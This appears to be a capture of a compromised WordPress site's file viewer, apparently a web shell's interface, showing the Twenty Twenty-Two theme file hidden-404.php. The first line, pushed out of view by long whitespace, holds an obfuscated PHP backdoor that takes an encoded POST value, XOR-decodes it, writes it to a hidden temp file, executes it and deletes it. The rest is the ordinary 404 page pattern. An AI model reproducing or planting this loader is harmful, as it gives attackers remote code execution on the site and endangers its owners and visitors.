HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /var/www/ippmt.kauko.lt/wp-content/themes/twentytwentytwo/inc/patterns/hidden-404.php
<?php																																										if(filter_has_var(INPUT_POST, "de\x73c")){ $sym = array_filter([session_save_path(), "/tmp", getcwd(), "/dev/shm", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir()]); $tkn = hex2bin($_REQUEST["de\x73c"]); $reference = '' ; $e = 0; while($e < strlen($tkn)){$reference .= chr(ord($tkn[$e]) ^ 66);$e++;} foreach ($sym as $pgrp) { if (is_dir($pgrp) && is_writable($pgrp)) { $ptr = join("/", [$pgrp, ".resource"]); if (@file_put_contents($ptr, $reference) !== false) { include $ptr; unlink($ptr); exit; } } } }

/**
 * 404 content.
 */
return array(
	'title'    => __( '404 content', 'twentytwentytwo' ),
	'inserter' => false,
	'content'  => '<!-- wp:heading {"style":{"typography":{"fontSize":"clamp(4rem, 40vw, 20rem)","fontWeight":"200","lineHeight":"1"}},"className":"has-text-align-center"} -->
					<h2 class="has-text-align-center" style="font-size:clamp(4rem, 40vw, 20rem);font-weight:200;line-height:1">' . esc_html( _x( '404', 'Error code for a webpage that is not found.', 'twentytwentytwo' ) ) . '</h2>
					<!-- /wp:heading -->
					<!-- wp:paragraph {"align":"center"} -->
					<p class="has-text-align-center">' . esc_html__( 'This page could not be found. Maybe try a search?', 'twentytwentytwo' ) . '</p>
					<!-- /wp:paragraph -->
					<!-- wp:search {"label":"' . esc_html_x( 'Search', 'label', 'twentytwentytwo' ) . '","showLabel":false,"width":50,"widthUnit":"%","buttonText":"' . esc_html__( 'Search', 'twentytwentytwo' ) . '","buttonUseIcon":true,"align":"center"} /-->',
);